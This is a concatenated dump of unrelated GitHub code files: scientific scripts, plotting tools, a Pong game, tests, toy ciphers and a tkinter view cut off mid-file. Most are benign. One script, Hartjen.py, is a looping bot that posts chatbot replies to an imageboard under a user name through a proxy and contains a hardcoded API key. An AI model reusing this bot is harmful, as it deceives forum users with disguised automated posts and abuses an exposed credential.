numGenerations, prefix = 'Progress:', suffix = 'Complete', length = 50)\n\n for j in range(numGenerations):\n for i in range(len(sigDF)-1):\n algo.propogate(sigDF[i],close[i],i)\n algo.calcFitness(close[-1])\n if(algo.population[0].bank+algo.population[0].shares*close[-1] > 2000):\n break\n # results = [(algo.population[x].bank+algo.population[x].shares*close[-1]) for x in range(len(algo.population))]\n results = algo.population[0].bank+algo.population[0].shares*close[i]\n transacs = algo.population[0].transactions\n \n algo.repopulate()\n # system(\"cls\")\n \n \n printProgressBar(j + 1, numGenerations, prefix = 'Progress:', suffix = 'Complete', length = 50) \n print(\"\\nTop Earner: \",results)\n print(\"Transactions: \",transacs)\n \n \n\n \n \n # Plot the result of a generation\n fig=plt.figure()\n ax=fig.add_subplot(111)\n data.plot(label=\"close\")\n ax.plot(algo.population[0].df.loc[algo.population[0].df==1].index,data[ algo.population[0].df.loc[algo.population[0].df==1].index],label='BUY',lw=0,marker='^',c='g')\n ax.plot(algo.population[0].df.loc[algo.population[0].df==-1].index,data[ algo.population[0].df.loc[algo.population[0].df==-1].index],label='SELL',lw=0,marker='v',c='r')\n # ax.plot(algo.population[0].df==-1,label='SHORT',lw=0,marker='v',c='r')\n plt.show()\n\n ","repo_name":"FireAndIceFrog/NZXPredictor","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37560216242","text":"\"\"\"\nThis script compute all alms squared windows, it's a necessary step of covariance computation.\n\"\"\"\nfrom pspy import so_dict, so_map, sph_tools, so_spectra, pspy_utils, so_mpi\nfrom pspipe_utils import pspipe_list\nimport numpy as np\nimport sys\n\n\ndef mult(map_a, map_b):\n\n res_a = 1 / map_a.data.pixsize()\n res_b = 1 / map_b.data.pixsize()\n\n if res_a == res_b:\n prod = map_a.copy()\n prod.data *= map_b.data\n elif res_a < res_b:\n print(\"resample map a\")\n prod = map_b.copy()\n map_a_proj = so_map.car2car(map_a, map_b)\n prod.data *= map_a_proj.data\n elif res_b < res_a:\n print(\"resample map b\")\n prod = map_a.copy()\n map_b_proj = so_map.car2car(map_b, map_a)\n prod.data *= map_b_proj.data\n \n return prod\n\n\nd = so_dict.so_dict()\nd.read_from_file(sys.argv[1])\n\nsurveys = d[\"surveys\"]\nlmax = d[\"lmax\"]\nniter = d[\"niter\"]\nsq_win_alms_dir = \"sq_win_alms\"\n\npspy_utils.create_directory(sq_win_alms_dir)\n\nn_sq_alms, sv1_list, ar1_list, sv2_list, ar2_list = pspipe_list.get_spectra_list(d)\n\n\nprint(\"number of sq win alms to compute : %s\" % n_sq_alms)\nso_mpi.init(True)\nsubtasks = so_mpi.taskrange(imin=0, imax=n_sq_alms - 1)\nprint(subtasks)\nfor task in subtasks:\n task = int(task)\n sv1, ar1, sv2, ar2 = sv1_list[task], ar1_list[task], sv2_list[task], ar2_list[task]\n\n win_T1 = so_map.read_map(d[\"window_T_%s_%s\" % (sv1, ar1)])\n win_T2 = so_map.read_map(d[\"window_T_%s_%s\" % (sv2, ar2)])\n\n sq_win = mult(win_T1, win_T2)\n #sq_win = win_T1.copy()\n #sq_win.data[:] *= win_T2.data[:]\n sqwin_alm = sph_tools.map2alm(sq_win, niter=niter, lmax=lmax)\n \n np.save(\"%s/alms_%s_%sx%s_%s.npy\" % (sq_win_alms_dir, sv1, ar1, sv2, ar2), sqwin_alm)\n\n","repo_name":"sgiardie/PSpipe","sub_path":"project/data_analysis/python/get_sq_windows_alms.py","file_name":"get_sq_windows_alms.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"31556999657","text":"from numpy import array\n\nfrom enable.api import KeySpec, BaseTool\nfrom traits.api import Instance\nfrom chaco.tools.api import PanTool, ZoomTool, LineInspector\nfrom chaco.tools.tool_states import PanState\nfrom chaco.api import AbstractOverlay\n\nclass PanToolWithHistory(PanTool):\n def __init__(self, *args, **kwargs):\n self.history_tool = kwargs.get('history_tool', None)\n if 'history_tool' in kwargs:\n del kwargs['history_tool']\n super(PanToolWithHistory, self).__init__(*args, **kwargs)\n \n\n def _start_pan(self, event, capture_mouse=False):\n super(PanToolWithHistory, self)._start_pan(event, capture_mouse=False)\n if self.history_tool is not None:\n self._start_pan_xy = self._original_xy\n # Save the current data range center so this movement can be\n # undone later.\n self._prev_state = self.history_tool.data_range_center()\n\n def _end_pan(self, event):\n super(PanToolWithHistory, self)._end_pan(event)\n if self.history_tool is not None:\n # Only append to the undo history if we have moved a significant\n # amount. This avoids conflicts with the single-click undo\n # function.\n new_xy = array((event.x, event.y))\n old_xy = array(self._start_pan_xy)\n if any(abs(new_xy - old_xy) > 10):\n next = self.history_tool.data_range_center()\n prev = self._prev_state\n if next != prev:\n self.history_tool.append_state(PanState(prev, next))\n\n\nclass KeyboardPanTool(PanToolWithHistory):\n \"\"\"Allow panning with the keyboard arrow keys\"\"\"\n\n left_key = Instance(KeySpec, args=(\"Left\",))\n right_key = Instance(KeySpec, args=(\"Right\",))\n up_key = Instance(KeySpec, args=(\"Up\",))\n down_key = Instance(KeySpec, args=(\"Down\",))\n\n\n def normal_key_pressed(self, event):\n x, y = (0, 0)\n pan_amount = 40\n if self.left_key.match(event):\n x += pan_amount\n elif self.right_key.match(event):\n x -= pan_amount\n elif self.up_key.match(event):\n y -= pan_amount\n elif self.down_key.match(event):\n y += pan_amount\n\n if x or y:\n self._start_pan(event)\n (event.x, event.y) = (self._original_xy[0] + x, self._original_xy[1] + y)\n self.panning_mouse_move(event)\n self._end_pan(event)\n\n\nclass PointerControlTool(BaseTool):\n \"\"\"Allow the pointer inside the bounds of a plot to be different to the\n pointer outside the bounds.\"\"\"\n def __init__(self, inner_pointer='arrow', *args, **kwargs):\n super(PointerControlTool, self).__init__(*args, **kwargs)\n # self.pointer defined in BaseTool\n self.inner_pointer = inner_pointer\n\n def normal_mouse_move(self, event):\n def within_bounds(component, x, y):\n if component is None:\n return False\n width, height = component.bounds\n left, top = component.x, component.y\n right, bottom = left + width, top + height\n return x >= left and x <= right and y >= top and y <= bottom\n\n if event.window:\n if within_bounds(self.component, event.x, event.y):\n # Apparently there's not a better way...\n event.window.set_pointer(self.inner_pointer)\n else:\n event.window.set_pointer(self.pointer)\n\n\nclass ClickUndoZoomTool(ZoomTool):\n def __init__(self, component=None, undo_button='right', *args, **kwargs):\n super(ClickUndoZoomTool, self).__init__(component, *args, **kwargs)\n self.undo_button = undo_button\n self._reverting = False\n self.minimum_undo_delta = 3\n\n def normal_left_down(self, event):\n \"\"\" Handles the left mouse button being pressed while the tool is\n in the 'normal' state.\n\n If the tool is enabled or always on, it starts selecting.\n \"\"\"\n if self.undo_button == 'left':\n self._undo_screen_start = (event.x, event.y)\n super(ClickUndoZoomTool, self).normal_left_down(event)\n\n def normal_right_down(self, event):\n \"\"\" Handles the right mouse button being pressed while the tool is\n in the 'normal' state.\n\n If the tool is enabled or always on, it starts selecting.\n \"\"\"\n if self.undo_button == 'right':\n self._undo_screen_start = (event.x, event.y)\n super(ClickUndoZoomTool, self).normal_right_down(event)\n\n def normal_left_up(self, event):\n if self.undo_button == 'left':\n if self._mouse_didnt_move(event):\n self.revert_history()\n\n def normal_right_up(self, event):\n if self.undo_button == 'right':\n if self._mouse_didnt_move(event):\n self.revert_history()\n\n def selecting_left_up(self, event):\n self.normal_left_up(event)\n super(ClickUndoZoomTool, self).selecting_left_up(event)\n\n def selecting_right_up(self, event):\n self.normal_right_up(event)\n super(ClickUndoZoomTool, self).selecting_right_up(event)\n\n def _mouse_didnt_move(self, event):\n start = array(self._undo_screen_start)\n end = array((event.x, event.y))\n return all(abs(end - start) == 0)\n\n def clear_undo_history(self):\n self._history_index = 0\n self._history = self._history[:1]\n\n def revert_history(self):\n if self._history_index > 0:\n self._history_index -= 1\n self._prev_state_pressed()\n\n def revert_history_all(self):\n self._history_index = 0\n self._reset_state_pressed()\n\n def _get_mapper_center(self, mapper):\n bounds = mapper.range.low, mapper.range.high\n return bounds[0] + (bounds[1] - bounds[0])/2.\n\n def data_range_center(self):\n x_center = self._get_mapper_center(self._get_x_mapper())\n y_center = self._get_mapper_center(self._get_y_mapper())\n return x_center, y_center\n\n def append_state(self, state):\n self._append_state(state, set_index=True)\n\n\n# Even thought it is an overlay, LineInspector doesn't seem to inherit\n# from AbstractOverlay. TraitsTool rightly assumes that it does, so\n# double-clicking a plot with a LineInspector overlay causes a traceback.\n# https://github.com/enthought/chaco/issues/72\nclass LineInspectorTool(LineInspector, AbstractOverlay):\n pass\n","repo_name":"AustralianSynchrotron/pdviper","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":6426,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"69"}
+{"seq_id":"39729120253","text":"import pygame\n\nfrom utils.constant import *\nfrom utils.platform import Platform\nfrom utils.ball import Ball\n\npygame.init()\n\nSCREEN = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('Pong!')\n\nplatform_group = pygame.sprite.Group()\nball_group = pygame.sprite.GroupSingle()\n\nr_lose, l_lose = 3, 3\nspeed = 5\nfont = pygame.font.SysFont('Arial', 40)\n\ndef font_set(l_lose, r_lose):\n global font\n font_l = font.render(f'{l_lose}', 1, 'White')\n font_r = font.render(f'{r_lose}', 1, 'White')\n font_l_rect = font_l.get_rect(topleft=(10, 10))\n font_r_rect = font_l.get_rect(topright=(WIDTH - 10, 10))\n SCREEN.blit(font_l, font_l_rect)\n SCREEN.blit(font_r, font_r_rect)\n \n\ndef losing(ball_group):\n global end_screen, r_lose, l_lose, speed\n\n if l_lose == 0 or r_lose == 0:\n r_lose, l_lose = 3, 3\n end_screen = True\n speed = 5\n\n\n if ball_group:\n if ball_group.sprite.rect.left >= WIDTH:\n r_lose -= 1\n speed += 2\n ball_group.sprite.kill()\n ball_w = Ball(platform_group, speed)\n ball_group.add(ball_w)\n \n elif ball_group.sprite.rect.right <= 0:\n l_lose -= 1\n speed += 2\n ball_group.sprite.kill()\n ball_w = Ball(platform_group, speed)\n ball_group.add(ball_w)\n\n\n return l_lose, r_lose, end_screen\n\n\ndef main():\n global end_screen, speed\n platform_l = Platform(100, HEIGHT//2, 'left')\n platform_r = Platform(WIDTH - 100, HEIGHT//2, 'right')\n platform_group.add(platform_l, platform_r)\n\n ball_w = Ball(platform_group, speed)\n ball_group.add(ball_w)\n\n clock = pygame.time.Clock()\n\n while True:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n end_screen = False\n \n if not end_screen:\n SCREEN.fill('Black')\n l_lose, r_lose, end_screen = losing(ball_group)\n font_set(l_lose, r_lose)\n\n platform_group.draw(SCREEN)\n platform_group.update()\n\n ball_group.draw(SCREEN)\n ball_group.update()\n else:\n\n SCREEN.fill('Black')\n if l_lose == 0:\n lose_font = font.render(f'Gracz prawy wygrał!', 1, 'White')\n lose_font_rect = lose_font.get_rect(center=(WIDTH//2, HEIGHT//2))\n SCREEN.blit(lose_font, lose_font_rect)\n else:\n lose_font = font.render(f'Gracz lewy wygrał!', 1, 'White')\n lose_font_rect = lose_font.get_rect(center=(WIDTH//2, HEIGHT//2))\n SCREEN.blit(lose_font, lose_font_rect)\n\n pygame.display.update()\n\nif __name__ == '__main__':\n end_screen = False\n main()","repo_name":"Ognaseon/pong-game-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"2704325971","text":"import json\nimport re\n\nfrom typing import TYPE_CHECKING, List\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom deker.arrays import VArray\nfrom deker.ctx import CTX\nfrom pytest_httpx import HTTPXMock\n\nfrom deker_server_adapters.array_adapter import ServerArrayAdapter\nfrom deker_server_adapters.errors import FilteringByIdInClusterIsForbidden\nfrom deker_server_adapters.varray_adapter import ServerVarrayAdapter\n\n\nif TYPE_CHECKING:\n from httpx import Request\n\n\ndef test_get_node_by_id(varray: VArray, server_varray_adapter: ServerVarrayAdapter, nodes_urls: List[str]):\n with patch.object(varray, \"primary_attributes\", {}):\n # Check window slides\n\n node = server_varray_adapter.get_host_url(server_varray_adapter.get_node(varray))\n assert node in nodes_urls\n\n\ndef test_get_node_by_primary(varray: VArray, server_varray_adapter: ServerVarrayAdapter, nodes_urls: List[str]):\n with patch.object(varray, \"primary_attributes\", {\"foo\": \"bar\"}):\n # Check window slides\n\n node = server_varray_adapter.get_host_url(server_varray_adapter.get_node(varray))\n assert node in nodes_urls\n\n\ndef test_get_node_give_same_result(varray: VArray, server_varray_adapter: ServerVarrayAdapter):\n first_node = server_varray_adapter.get_node(varray)\n for _ in range(10):\n node = server_varray_adapter.get_node(varray)\n assert node == first_node\n\n\ndef test_array_generate_id(\n varray: VArray,\n server_varray_adapter: ServerVarrayAdapter,\n httpx_mock,\n collection,\n server_array_adapter: ServerArrayAdapter,\n):\n httpx_mock.add_response(method=\"POST\", json=varray.as_dict, status_code=201)\n data = varray.as_dict\n data.update({\"id\": None, \"id_\": None, \"primary_attributes\": None})\n server_varray_adapter.create(\n {\n **data,\n \"adapter\": server_varray_adapter,\n \"collection\": collection,\n \"array_adapter\": server_array_adapter,\n }\n )\n requests: List[Request] = httpx_mock.get_requests()\n for request in requests:\n if request.method == \"POST\":\n assert json.loads(request.content.decode())[\"id_\"]\n\n\ndef test_read_meta_success(varray: VArray, httpx_mock: HTTPXMock, server_varray_adapter: ServerArrayAdapter, ctx: CTX):\n node = server_varray_adapter.get_host_url(server_varray_adapter.get_node(varray))\n httpx_mock.add_response(\n json=varray.as_dict,\n method=\"GET\",\n url=re.compile(f\"{node}/v1/collection/{varray.collection}/varray/by-id/{varray.id}\"),\n )\n assert server_varray_adapter.read_meta(varray) == json.loads(json.dumps(varray.as_dict))\n\n\ndef test_filter_by_id_is_not_allowed(varray_collection_with_primary_attributes):\n with pytest.raises(FilteringByIdInClusterIsForbidden):\n varray_collection_with_primary_attributes.filter({\"id\": \"foo\"}).last()\n","repo_name":"openweathermap/deker-server-adapters","sub_path":"tests/test_cases/test_cluster/test_varray_adapters.py","file_name":"test_varray_adapters.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"3604765874","text":"import requests\r\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\r\nfrom selenium import webdriver\r\nimport sys\r\nimport json\r\nimport os\r\nimport random\r\nimport time\r\n\r\n##Proxy settings on by default\r\nPROXY = \"p.webshare.io:19999\"\r\nwebdriver.DesiredCapabilities.FIREFOX['proxy'] = {\r\n \"httpProxy\": PROXY,\r\n \"ftpProxy\": PROXY,\r\n \"sslProxy\": PROXY,\r\n \"proxyType\": \"MANUAL\",\r\n\r\n}\r\n\r\nwhile True:\r\n ##Images\r\n path = \"/root/home/selenium/Cirno/\"\r\n random_filename = random.choice([\r\n x for x in os.listdir(path)\r\n if os.path.isfile(os.path.join(path, x))\r\n ])\r\n\r\n myrandomfile = (path + random_filename)\r\n\r\n ##Main\r\n options = FirefoxOptions()\r\n options.add_argument(\"-headless\")\r\n\r\n driver = webdriver.Firefox(options=options)\r\n\r\n driver.get(\"http://www.tokyochronos.net/cute/thread/2579/\")\r\n\r\n ##Find last post in thread\r\n elements = driver.find_elements_by_xpath(\"//div[contains(@class, 'text')]\")\r\n size = len(elements)\r\n target_element = elements[size - 1]\r\n ##Pokemon stuff\r\n\r\n mystfuline = (target_element.text)\r\n\r\n mystfulinestripped = (mystfuline).lstrip()\r\n driver.close()\r\n\r\n my_humanresponse = print(mystfulinestripped)\r\n\r\n r = requests.get(f'https://www.personalityforge.com/api/chat/?apiKey=XbNsywHwMMemhr0C&chatBotID=63906&message={my_humanresponse}&externalID=qwe-669669946&firstName=Arc&lastName=Hatewise&gender=m')\r\n\r\n myprintvar = print(r.json())\r\n\r\n myJson = str(r.content)\r\n\r\n original_stdout = sys.stdout\r\n\r\n\r\n #write PFbot response\r\n with open('tay_response.json', 'w') as f:\r\n sys.stdout = f\r\n print(r.text)\r\n sys.stdout = original_stdout\r\n\r\n with open('tay_response.json') as json_file:\r\n data = json.load(json_file)\r\n\r\n myTayresponse = data['message']['message']\r\n\r\n print(myTayresponse)\r\n\r\n ##Fuuka functionality\r\n\r\n driver = webdriver.Firefox(options=options)\r\n\r\n driver.get(\"http://www.tokyochronos.net/cute/thread/2579/\")\r\n\r\n replybox = driver.find_element_by_id(\"reply_chennodiscursus\")\r\n replybox.send_keys(myTayresponse)\r\n\r\n replyboxN = driver.find_element_by_id(\"reply_bokunonome\")\r\n replyboxN.send_keys(\"Hartjen#clingy\")\r\n\r\n replyboxFile = driver.find_element_by_id(\"file_image\")\r\n replyboxFile.send_keys(myrandomfile)\r\n\r\n element = driver.find_element_by_xpath(\r\n \"/html/body/div[2]/div[2]/article[1]/div[7]/section/form/fieldset/div[3]/div/input[1]\").click()\r\n time.sleep(180)\r\n print(\"Sleeping\", 22, \"...\")\r\n driver.close()\r\n","repo_name":"w2-seraph/Arc_linux","sub_path":"Hartjen.py","file_name":"Hartjen.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11528411048","text":"from django.contrib import admin\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom openzaak.utils.admin import UUIDAdminMixin\n\nfrom ..models import CheckListItem, StatusType\nfrom .mixins import CatalogusContextAdminMixin, ReadOnlyPublishedZaaktypeMixin\n\n\nclass ChecklistItemInline(admin.TabularInline):\n model = CheckListItem\n fields = (\n \"itemnaam\",\n \"vraagstelling\",\n \"verplicht\",\n \"toelichting\",\n )\n extra = 1\n\n\n@admin.register(StatusType)\nclass StatusTypeAdmin(\n ReadOnlyPublishedZaaktypeMixin,\n UUIDAdminMixin,\n CatalogusContextAdminMixin,\n admin.ModelAdmin,\n):\n model = StatusType\n\n # List\n list_display = (\"statustype_omschrijving\", \"statustypevolgnummer\", \"zaaktype\")\n list_filter = (\"zaaktype\", \"informeren\")\n search_fields = (\n \"uuid\",\n \"statustype_omschrijving\",\n \"statustype_omschrijving_generiek\",\n \"statustypevolgnummer\",\n )\n ordering = (\"zaaktype\", \"statustypevolgnummer\")\n\n # Details\n fieldsets = (\n (\n _(\"Algemeen\"),\n {\n \"fields\": (\n \"statustype_omschrijving\",\n \"statustype_omschrijving_generiek\",\n \"statustypevolgnummer\",\n \"informeren\",\n \"statustekst\",\n \"toelichting\",\n \"datum_begin_geldigheid\",\n \"datum_einde_geldigheid\",\n )\n },\n ),\n (_(\"Relaties\"), {\"fields\": (\"zaaktype\",)}),\n )\n inlines = [ChecklistItemInline]\n raw_id_fields = (\"zaaktype\",)\n readonly_fields = (\"uuid\",)\n","repo_name":"open-zaak/open-zaak","sub_path":"src/openzaak/components/catalogi/admin/statustype.py","file_name":"statustype.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"69"}
+{"seq_id":"35798096701","text":"import setuptools\n\nwith open(\"DESCRIPTION\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"lightfly\",\n version=\"0.1.6\",\n author=\"Weinan Tang\",\n license=\"GPLv3\",\n author_email=\"twn39@163.com\",\n description=\"A finance platform for china.\",\n install_requires=[\n 'requests>=2.0',\n 'pandas >= 0.20'\n ],\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/pypa/sampleproject\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU Affero General Public License v3\",\n \"Operating System :: OS Independent\",\n \"Natural Language :: Chinese (Simplified)\",\n \"Topic :: Scientific/Engineering :: Mathematics\"\n ],\n)","repo_name":"lightfly-finance/lightfly-py","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"4010143497","text":"from collections import defaultdict\nfrom string import ascii_lowercase\n\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n hashmap = defaultdict(list)\n alphabet_idx_map = {alph:idx for idx, alph in enumerate(ascii_lowercase)}\n for strng in strs:\n key = [0 for _ in range(len(ascii_lowercase))]\n for char in strng:\n char_idx = alphabet_idx_map[char]\n key[char_idx] += 1\n hashmap[str(key)].append(strng)\n \n return hashmap.values()\n \n ","repo_name":"SaheedAde/LeetcodeDSA","sub_path":"0049-group-anagrams/0049-group-anagrams.py","file_name":"0049-group-anagrams.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72187904221","text":"#Battle Menu 2\n#The code for the menu that appears when Harry enters a battle with enemies\n#displays the actions he can take\n\nfrom pygame import*\nimport os\n\n#Window preferences\nos.environ['SDL_VIDEO_WINDOW_POS'] = '25,50' #Opens up in the upper left corner \nscreen = display.set_mode((850,600)) #Game window resolution\ndisplay.set_caption(\"Harry Potter: New Horizons\")\nmouse.set_cursor(*cursors.tri_left)\n\n#Already Loaded in main\nprofilePic = image.load (\"profilePic.png\")\n#*******\n\n#Load idle sprites, these lists hold the sprites for the animations of the enemies\n#during battle screens \nenemyIdleSpritesList = []\nenemyAttackSpritesList = [] \nenemyFrame = 0\n\nenemyMode = \"Attack\" #change to default Idle \n\nfor i in range (6):\n enemyIdleSpritesList.append(image.load(\"enemyIdleSprite\\\\enemyIdleSprite\"+str(i)+\".png\"))\n enemyIdleSpritesList[i] = transform.scale(enemyIdleSpritesList[i],(50,60))\n\nfor i in range (6):\n enemyAttackSpritesList.append(image.load(\"enemyAttackSprite\\\\enemyAttackSprite\"+str(i)+\".png\"))\n enemyAttackSpritesList[i] = transform.scale(enemyAttackSpritesList[i],(50,60))\n\nscreen.fill((0,0,0)) #replace later \n\nrunning = True\nwhile running:\n\n mb = mouse.get_pressed()\n mx,my = mouse.get_pos()\n\n for e in event.get(): \n if e.type == QUIT: \n running = False\n \n #Some variable that keeps track of whether or not harry in is a battle\n #Eg. triggered when harry walks into the blue blob \n #if gameMode == \"Battle\":\n\n if enemyMode == \"Attack\": #if the enemy is attacking:\n screen.fill((0,0,0))\n screen.blit(enemyAttackSpritesList[enemyFrame],(80,400))\n time.wait(100)\n enemyFrame +=1\n if enemyFrame>5:\n enemyFrame = 0\n enemyMode=\"Idle\" \n #Add code when harry finishes his move, the enemy attacks again\n \n elif enemyMode == \"Idle\": #if the enemy is not attacking:\n screen.fill((0,0,0))\n screen.blit(enemyIdleSpritesList[enemyFrame],(80,400))\n time.wait(80)\n enemyFrame +=1\n if enemyFrame>5:\n enemyFrame=0\n \n display.flip()\nquit()\n","repo_name":"DSchana/Final-Project-11","sub_path":"Compsci Final Project/battleMenu SPRITE (COMBINE WITH BATTLEMENU NEW).py.py","file_name":"battleMenu SPRITE (COMBINE WITH BATTLEMENU NEW).py.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71385277660","text":"import datetime\nimport hashlib\n\n\n# Caesar encryption\n\n# шифрование текста\ndef encrypt_caesar(msg, k):\n return shift_caesar(msg, k)\n\n\n# дешифрование текста\ndef decrypt_caesar(msg, k):\n return shift_caesar(msg, -k)\n\n\n# функция сдвига символов сообщения msg на key позиций\ndef shift_caesar(msg, key):\n shifted = []\n for letter in msg:\n shifted.append(chr((ord(letter) + key) % 65536))\n return ''.join(shifted)\n\n\n# Vigenere encryption\n\n# вспомогательная функция доформирования ключа\ndef key_vigenere(n, k):\n diff = n - len(k)\n if diff > 0:\n k += (diff // len(k)) * k + k[:diff % len(k)]\n key = []\n for letter in k:\n key.append(int(letter))\n return key\n\n\n# шифрование текста\ndef encrypt_vigenere(msg, k):\n if not k.isdigit():\n return \"Wrong format of the key\"\n return shift_vigenere(msg, key_vigenere(len(msg), k))\n\n\n# дешифрование текста\ndef decrypt_vigenere(msg, k):\n if not k.isdigit():\n return \"Wrong format of the key\"\n return shift_vigenere(msg, [i * (-1) for i in key_vigenere(len(msg), k)])\n\n\n# функция сдвига символов сообщения msg на key позиций\ndef shift_vigenere(msg, key):\n shifted = []\n for i, letter in enumerate(msg):\n shifted.append(chr((ord(letter) + key[i]) % 65536))\n return ''.join(shifted)\n\n\n# OTP (Vernam) generation\n\ndef encrypt_otp(msg, key):\n if len(msg) != len(key):\n return \"Wrong length\"\n result = []\n for i in range(len(msg)):\n key_bin = ''.join(format(ord(key[i]), 'b'))\n msg_bin = ''.join(format(ord(msg[i]), 'b'))\n result.append(int(\"0b\" + ''.join([str(int(msg_bin[j]) ^ int(key_bin[j])) for j in range(7)]), 2))\n return result\n\n\n# Blockchain\n\nclass BlockChain:\n\n def __init__(self, index, timestamp, msg, last_key):\n self.index = index\n self.timestamp = timestamp\n self.msg = msg\n self.last_key = last_key\n self.key = self.keygen()\n\n # шифрование и создание блока шифротекста\n def keygen(self):\n sha = hashlib.sha256()\n sha.update((str(self.index) + str(self.timestamp) + str(self.msg) + str(self.last_key)).encode('utf-8'))\n return sha.hexdigest()\n\n# создание следущего блока\ndef next_block(block):\n index = block.index + 1\n timestamp = datetime.datetime.now()\n msg = \"New block \" + str(index)\n key = block.key\n return BlockChain(index, timestamp, msg, key)\n\n# создание первого блока\ndef create_first_block():\n return BlockChain(0, datetime.datetime.now(), \"Start chain\", \"0\")\n\n\n# Feistel network\n\nkey = 'Abcdefg'\nposition = 0\n\n# шифрование текста\ndef encrypt_festel(msg):\n global position\n if len(msg) % 2 != 0:\n msg = msg + ' '\n result = []\n for i in range(0, len(msg), 2):\n result.append(shift_festel(ord(msg[i]), ord(msg[i + 1]), 1))\n position -= 1\n return ''.join(result)\n\n\n# дешифрование текста\ndef decrypt_festel(msg):\n if len(msg) % 2 != 0:\n msg = msg + ' '\n result = []\n for i in range(len(msg) - 1, -1, -2):\n result.insert(0, shift_festel(ord(msg[i - 1]), ord(msg[i]), -1))\n return ''.join(result)\n\n\n# алгоритм сети Фейстеля\ndef shift_festel(L, R, pos):\n global position\n for i in range(16):\n k = ord(key[position % len(key)])\n L, R = R ^ (L ^ k), L\n position += pos\n return chr(R) + chr(L)\n\n\ntext = 'What is a wonderful night'\n\nprint(text)\ns = encrypt_caesar(text, 7)\nprint(s)\nprint(decrypt_caesar(s, 7))\nprint()\nprint(text)\ns = encrypt_vigenere(text, \"357689\")\nprint(s)\nprint(decrypt_vigenere(s, \"357689\"))\nprint()\nprint(text)\ns = encrypt_festel(text)\nprint(s)\nprint(decrypt_festel(s))\nprint()\nprint(encrypt_otp(\"LONDON\", \"SYSTEM\"))\n","repo_name":"ElizavetaWow/NetworkTech","sub_path":"Ecryption/ecryption.py","file_name":"ecryption.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18951667728","text":"from tkinter import *\nfrom tkinter import ttk\nimport tkinter as tk\n\n\nclass DeviceConfigVlansView(tk.Toplevel):\n def __init__(self, rootWindow,controller, name, dataVlans):\n super().__init__(rootWindow, height=673, width=762, bg=\"white\", highlightbackground=\"#00A2FF\", highlightthickness=4)\n self.controller = controller\n self.name = name\n self.dataVlans = dataVlans\n self.resizable(width=True, height=True)\n #self.configure(background=\"#D9D9D9\")\n self.geometry(\"530x450\")\n self.title(\"Config Routing de {}.\".format(name))\n self.update()\n self.data = {\n \"vlanId\": \"\",\n \"vlanNom\": \"\",\n \"layer3\": {\n \"ip\": \"\"\n }}\n self.createView(name)\n\n\n def createView(self, name):\n imgBtnAccept = PhotoImage(file = 'Vista/assets/btn_accept_config.png')\n imgBtnCancel = PhotoImage(file = 'Vista/assets/btn_cancel_config.png')\n imgLineaBg = PhotoImage(file = 'Vista/assets/linea_bg.png')\n self.image = imgLineaBg\n\n titLabel = Label(self)\n titLabel.place(relx=0.18, rely=0.089, height=21, width=389)\n titLabel.configure(font=\"-family {Andale Mono} -size 17\")\n titLabel.configure(text=\"Configuracion de VLANs en {}\".format(self.name))\n\n vidLabel = Label(self)\n vidLabel.place(relx=0.083, rely=0.27, height=19, width=65)\n vidLabel.configure(font=\"-family {Andale Mono}\")\n vidLabel.configure(relief=\"flat\")\n vidLabel.configure(anchor='w')\n vidLabel.configure(justify='left')\n vidLabel.configure(text='''VLAN ID''')\n\n self.vidEntry = Entry(self)\n self.vidEntry.place(relx=0.217, rely=0.267, height=25, relwidth=0.123)\n self.vidEntry.configure(background=\"#ABE0FF\")\n self.vidEntry.configure(font=\"-family {Andale Mono}\")\n\n\n nomLabel= Label(self)\n nomLabel.place(relx=0.05, rely=0.41, height=19, width=90)\n nomLabel.configure(font=\"-family {Andale Mono}\")\n nomLabel.configure(relief=\"flat\")\n nomLabel.configure(anchor='w')\n nomLabel.configure(justify='left')\n nomLabel.configure(text='''Nombre VLAN''')\n\n self.nomEntry = Entry(self)\n self.nomEntry.place(relx=0.25, rely=0.4, height=25, relwidth=0.157)\n self.nomEntry.configure(background=\"#ABE0FF\")\n self.nomEntry.configure(font=\"TkFixedFont\")\n\n\n sviLabel = Label(self)\n sviLabel.place(relx=0.1, rely=0.533, height=19, width=195)\n sviLabel.configure(font=\"-family {Andale Mono} -size 15\")\n sviLabel.configure(relief=\"flat\")\n 